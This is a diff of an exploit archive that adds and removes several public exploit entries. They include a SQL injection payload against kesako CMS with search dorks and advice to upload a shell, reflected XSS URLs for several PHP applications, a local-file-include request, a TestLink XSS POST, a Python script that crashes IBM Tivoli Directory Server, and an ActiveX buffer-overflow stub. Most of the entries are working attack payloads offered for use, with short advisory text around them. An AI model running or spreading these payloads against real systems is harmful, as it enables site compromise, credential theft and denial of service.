An attacker may leverage the cross-site scripting issues and HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The attacker can exploit the security-bypass weakness in conjunction with other latent vulnerabilities to bypass certain security restrictions.
Versions prior to Zend Framework 1.7.9, 1.8.5, and 1.9.7 are vulnerable.
The following example URI is available:
http://www.example.com/index.php?lang=english&skin=&debut=0&seeAdd=1&seeNotes=&seeMess=[XSS-Vuln]

35
platforms/php/webapps/33492.txt
View file

@ -1,35 +0,0 @@
kesako script SQL Injection
===================================================================
####################################################################
#.:. Exploit Title : kesako Script Sql Injection #
# .:. Author : Microsoft-dz #
#.:. Contact : [ifyoucanbebeme@gmail.com] #
#.:. Dork : intext:powered by [kesako] inurl:/event.php?id= #
#.:. Dork 2 : intext:powered by [kesako] #
#.:. Tested on : win&linux #
#.:. Vendor's Website : http://www.kesako.ch/cms/ #
#.:. Date : [2014/5/19] #
####################################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] www.site.com/modules/event.php?id=[SQL INJECTION]
[~] www.site.com/modules/event.php?id=[SQL INJECTION]
#########
P0C
#########
Type: String Mysql Injection
http://SITE/modules/event.php?id=[SQL INJECTION]
http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
####################################################################
1- Get Admin Infos
2- then login and upload your shell
Enjoy
About #20K Infected Websites :v
You Can Find The Admin Panel @ http://site/cms/admin
or http://site/cms/user/
or http://site/cms/login/
#########################################################################
Tnx: R3Z0Uk4

7
platforms/php/webapps/33526.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37811/info
Technology for Solutions is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/eng/contacto_demo.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

10
platforms/php/webapps/33528.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37818/info
Xforum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Xforum 1.4; other versions may also be vulnerable.
http://www.example.com/forum/liste.php?categorie=1&nbpage=1&nbpageliste=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

9
platforms/php/webapps/33529.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37819/info
The Joomla! 'com_marketplace' component is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects com_marketplace 1.2; other versions may also be affected.
http://www.example.com/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

10
platforms/php/webapps/33530.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37828/info
LetoDMS (formerly known as MyDMS) is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
LetoDMS 1.7.2 is vulnerable; other versions may also be affected.
GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1

22
platforms/php/webapps/33534.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/37839/info
TestLink is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TestLink 1.8.5 is vulnerable; other versions may also be affected.
POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache
operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login

88
platforms/unix/dos/33527.py Executable file
View file

@ -0,0 +1,88 @@
source: http://www.securityfocus.com/bid/37817/info
IBM Tivoli Directory Server is prone to a denial-of-service vulnerability caused by heap memory corruption.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
IBM Tivoli Directory Server 6.2 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
# tivoli_nullptr.py
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import socket
import sys
"""
Discovery date: April, 2006!!!
IBM Tivoli Directory Server 6.2 do_extendedOp DoS (null ptr dereference)
Tested on Red Hat Enterprise Linux Server release 5.4
# rpm -qa|grep idsldap-srv32bit
idsldap-srv32bit62-6.2.0-7
gdb backtrace:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x6c76b90 (LWP 2224)]
0x0807a1fc in do_extendedOp ()
(gdb) bt
#0 0x0807a1fc in do_extendedOp ()
#1 0x08073c5a in ConnMgr::connection_operation ()
#2 0x080dee1d in Worker::Run ()
#3 0x080bca46 in Thr::_doRun ()
#4 0x003195ab in start_thread () from /lib/libpthread.so.0
#5 0x00eb8cfe in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x807a1fc : repz cmpsb %es:(%edi),%ds:(%esi)
(gdb) i r
eax 0x50 80
ecx 0x10 16
edx 0x6c760b0 113729712
ebx 0x81393c8 135500744
esp 0x6c760e0 0x6c760e0
ebp 0x6c761d8 0x6c761d8
esi 0x0 0
edi 0x80f7ed0 135233232
eip 0x807a1fc 0x807a1fc
eflags 0x210202 [ IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
"""
def send_req(host,port):
buf = "\x30\x26\x02\x02\x01\x91\x77\x20\x2d\x32\x36\x38\x34\x33\x35\x34"
buf += "\x35\x35\x0f\x31\x2e\x33\x2e\x31\x38\x2e\x30\x2e\x32\x2e\x31\x32"
buf += "\x2e\x31\x81\x04\x30\x02\x04\x00"
print "Sending req to %s:%d, oid 1.3.18.0.2.12.1" % (host,port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
sock.sendall(buf)
sock.close()
print "Done"
if __name__=="__main__":
if len(sys.argv)<3:
print "usage: %s host port" % sys.argv[0]
sys.exit()
send_req(sys.argv[1],int(sys.argv[2]))

10
platforms/windows/dos/33533.html Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37834/info
Gracenote CDDBControl is prone to a stack-based buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
NOTE: The ActiveX control is included in AOL 9.5; other applications may also include the ActiveX control.
<package> <job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' /> <script language='vbscript'> arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") target.ViewProfile arg1 </script> </job> </package>